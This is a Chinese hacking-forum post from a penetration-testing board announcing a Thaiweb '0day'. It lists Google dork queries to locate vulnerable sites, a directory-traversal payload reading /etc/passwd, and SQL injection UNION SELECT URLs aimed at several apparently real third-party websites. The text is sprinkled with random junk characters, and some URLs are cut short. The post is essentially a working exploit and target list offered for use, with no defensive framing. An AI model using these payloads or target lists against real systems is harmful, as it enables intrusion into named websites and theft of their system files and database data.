找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Thaiweb远程文件sql注入漏洞0day
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2525|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:" B) p) e! D0 I
; w+ n4 K3 t) S7 ?" q
intext:powered by Thaiweb
- K7 n, W5 o5 I# Y% G: F' `+ `3 k9 a) \; Z; {/ ~% w
inurl:index.php?page=board.php. b( y4 u9 \5 @! Z' E3 t: K
7 T- O% L6 A% M5 ]$ a; I2 i, W

: ]* d, V1 d  O& P
! _2 r2 k& C& L利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
1 s& E! w7 Y/ X0 `! j2 o5 f" n# s
4 Z8 j9 ]8 g$ j1 K ( V/ ?( a6 l6 U4 U
" V8 h& I0 m# D# J
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
. a4 P( ~4 w/ O' j% Q" ^& g( _7 }
. j/ X) W* w' X/ r ( T( l" `% O5 D: v. p- W) f3 A

3 O$ Z( O8 m- [, Z$ L' A# z- ihttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--9 d# F) [- W- u- w

- M2 P7 ]: ^1 v9 ]# O- u, ^+ K" lhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
" p) N8 _( K: M/ K8 t 5 M9 k7 e: c* D2 {$ Z- ~) n/ D
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--( }6 G; t* D! [* Y+ ~3 H& O. X9 p
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表